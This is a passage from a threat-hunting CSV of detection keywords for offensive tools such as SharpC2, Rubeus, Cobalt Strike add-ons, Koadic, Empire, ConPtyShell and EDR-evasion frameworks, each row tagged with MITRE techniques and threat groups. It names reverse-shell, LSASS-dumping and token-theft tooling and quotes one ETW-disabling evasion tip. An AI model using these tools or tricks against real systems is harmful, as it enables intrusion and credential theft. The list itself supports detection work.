TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/Silver.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Commands/StealToken.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/StopDrone.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/TakeScreenshot.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/WhoAmI.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/WinRmCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Commands/WmiCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*commixproject/commix*","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4035","782","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z" +"*common.ReflectiveDLL*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" +"*common.ReflectiveDLL*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*common_passwords.txt*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*commonspeak_sublist.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"*communicate_as_backdoor_user.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*comnap_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*comnode_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*compile_implant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*completedns-get-ns-history*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*COMPlus_ETWEnabled=0\0\0\0*","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*compress_encode_obfs*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*computers_pwdnotreqd*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*comsvcs_lsass*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*ComsvcsLSASS*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*config/51pwn/CVE-*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*Confuser.CLI.Exe*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*Confuser.CLI.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Confuser.DynCipher.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Confuser.Renamer.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Connect-AzureAD -AadAccessToken -AccountId *","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*Connection refused: tcp_wrappers denial.*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*Connection refused: too many sessions for this address.*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*connormcgarr/tgtdelegation*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*conptyshell *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*ConPtyShell.cs*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*ConPtyShell.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*ConPtyShell.zip*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*ConPtyShell_dotnet2.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*-consoleoutput -DomainRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*-consoleoutput -Localrecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*contact_harvester*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*ContainYourself.cpp*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*ContainYourself.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*ContainYourself.sln*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*ContainYourself-main*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*ContainYourselfPoc.cpp*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*ContainYourselfPoc.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*ContainYourselfPoc\*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*ContainYourselfTempFile.txt*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*ContentHijacking.swf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ConvertFrom-LDAPLogonHours*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Convert-NT4toCanonical*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*ConvertTo-LogonHoursArray*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ConvertTo-Rc4ByteStream*","offensive_tool_keyword","empire","empire function name. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 